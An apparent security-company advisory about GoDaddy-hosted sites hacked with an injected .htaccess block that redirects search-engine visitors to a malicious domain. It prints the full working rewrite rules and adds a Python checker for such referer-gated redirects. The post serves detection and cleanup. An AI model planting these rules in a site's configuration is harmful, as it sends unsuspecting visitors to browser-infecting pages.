We are seeing many sites hosted on GoDaddy shared servers
getting compromised today (and for the last few days) with a conditional
redirection to sokoloperkovuskeci.com. This is what it looks like on
our scanner:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105
This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]
What is going on?
These redirection attacks are very common on outdated WordPress and
Joomla sites, but this time (and for this specific malicious domain), we
are only seeing them on GoDaddy-hosted sites. So it looks like a
compromise on their own servers (similar to what has happened in the
past).
What happens to anyone visiting these hacked sites?
The malware checks whether anyone visiting the infected site is coming
from a Google search (or Yahoo, or Bing) and, if they are, redirects them
to that domain (sokoloperkovuskeci.com). From there, the user gets
redirected again to other locations to get their browsers infected too.
So you have to fix your site ASAP to protect your own users.
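A check for this pattern, as an added example (not Sucuri's scanner code): it walks the contents of an .htaccess file and flags any RewriteRule that sends visitors to an external host and is gated on HTTP_REFERER conditions. The function name, the own_hosts parameter and the shortened sample file are assumptions constructed for illustration.

```python
import re

# Constructed sample: a shortened copy of the injected block shown above,
# followed by a legitimate same-site rewrite that must not be flagged.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]
# Legitimate rule: same-site rewrite with no referer condition
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
EXTERNAL_RE = re.compile(r"^https?://([^/:?#]+)", re.I)


def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target_host, referer_patterns) for every RewriteRule
    that points at a foreign host and is gated on HTTP_REFERER conditions."""
    findings, pending = [], []
    own = {h.lower() for h in own_hosts}  # hosts the site legitimately redirects to
    for line_no, line in enumerate(text.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:
            # RewriteCond lines accumulate and apply to the next RewriteRule only.
            pending.append((cond.group(1), cond.group(2)))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        referers = [pat for var, pat in pending if var.upper() == "%{HTTP_REFERER}"]
        pending = []  # conditions are consumed by this rule
        target = EXTERNAL_RE.match(rule.group(2))
        if target and referers and target.group(1).lower() not in own:
            findings.append((line_no, target.group(1).lower(), referers))
    return findings


if __name__ == "__main__":
    for line_no, host, referers in find_referer_redirects(SAMPLE_HTACCESS):
        print(f"line {line_no}: referer-gated redirect to {host} "
              f"({len(referers)} referer conditions)")
```

Because RewriteOptions inherit is part of the injected block, run the check against the .htaccess in every directory of the account, not only the web root.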
Need help?
You can scan your site here: sitecheck.sucuri.net to see if it is
compromised. If you need someone to clean it up for you, sign up here:
Sucuri Signup